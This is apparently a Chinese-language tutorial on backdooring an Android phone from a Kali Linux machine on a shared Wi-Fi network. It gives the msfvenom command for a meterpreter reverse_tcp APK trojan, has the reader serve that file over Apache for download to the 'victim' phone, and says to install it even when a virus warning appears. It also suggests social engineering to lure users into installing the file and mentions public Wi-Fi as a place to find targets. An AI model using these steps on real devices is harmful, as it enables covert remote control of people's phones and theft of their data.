一、網(wǎng)絡(luò)配置
1、首先保證所有的設(shè)備(kali虛擬機(jī)和Android/ target=_blank class=infotextkey>安卓手機(jī))都連接到同一個(gè)局域網(wǎng)(Wi-Fi)下。
在現(xiàn)實(shí)生活中,黑客通常找尋免費(fèi)的公共Wi-Fi,來保證有足夠多的安卓手機(jī)供其滲透。所以如無必要,還是盡量不要使用公共Wi-Fi。
操作詳解:
Kali設(shè)置網(wǎng)絡(luò)環(huán)境(橋接模式)

然后再點(diǎn)擊 “確定”即可。
2、受害者安卓手機(jī)的網(wǎng)絡(luò)設(shè)置
將安卓手機(jī)連接到與kali虛擬機(jī)相通的局域網(wǎng)下,并查看其ip地址。

3、查看kali虛擬機(jī)的ip地址是否與安卓手機(jī)在同一局域網(wǎng)下(網(wǎng)段)
在kali終端輸入:ifconfig

4、生成安卓木馬
讓所有的安卓手機(jī)(與kali虛擬機(jī)在同一個(gè)局域網(wǎng)之中)。
在kali中生成一個(gè)安卓木馬(一個(gè)apk文件),在終端輸入命令:
msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 R>/root/shell.apk
用msfvenom生成一個(gè)安卓端的meterpreter的反向payload
–p (- -payload-options) 添加載荷payload。
載荷這個(gè)東西比較多,這個(gè)軟件就是根據(jù)對(duì)應(yīng)的載荷payload生成對(duì)應(yīng)平臺(tái)下的后門,所以只有選對(duì)payload,再填寫正確自己的IP,PORT就可以生成對(duì)應(yīng)語言,對(duì)應(yīng)平臺(tái)的后門了!
上面的命令是指定返回一個(gè)tcp的payload
lhost指定本定監(jiān)聽的地址,即本地kali虛擬機(jī)的ip地址。
lport指定監(jiān)聽本地的端口號(hào)(4444)
5、操作詳解:
用msfvenom生成一個(gè)安卓端的meterpreter的反向payload

由于我們只是滲透測(cè)試,并且攻擊環(huán)境并不非常理想化,有興趣的可以使用社會(huì)工程學(xué)來誘導(dǎo)用戶對(duì)該apk文件下載并安裝。接下來,就只開啟apach服務(wù),讓安卓主機(jī)自動(dòng)安裝該apk文件。

6、在安卓手機(jī)瀏覽器的地址欄輸入:192.168.0.102/shell.apk,kali虛擬機(jī)的IP地址/shell。apk。并將apk木馬文件下載下來。

即使提醒病毒風(fēng)險(xiǎn),也沒有多大關(guān)系,繼續(xù)安裝成功就可以。
